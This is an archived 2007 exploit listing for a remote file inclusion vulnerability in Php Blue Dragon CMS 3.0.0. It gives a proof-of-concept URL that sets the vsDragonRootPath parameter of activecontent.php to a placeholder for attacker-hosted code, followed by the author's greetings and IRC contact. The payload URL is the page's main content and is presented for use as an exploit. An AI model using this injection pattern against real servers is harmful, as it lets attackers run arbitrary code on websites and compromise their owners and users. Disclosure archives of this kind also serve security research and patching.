Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
# Published : 2007-08-10
# Author : Kacper
# Previous Title : Php Blue Dragon CMS 3.0.0 Remote SQL Injection Exploit
# Next Title : Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln

// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/

// Autor: Kacper [kacper1964@yahoo.pl]
// Autor Homepage: devilteam.eu  |  kacper.bblog.pl

//Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc!
//Irc: irc.milw0rm.com:6667 #devilteam

//Elo

Vulnerability:


http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]

# www.Syue.com [2007-08-10]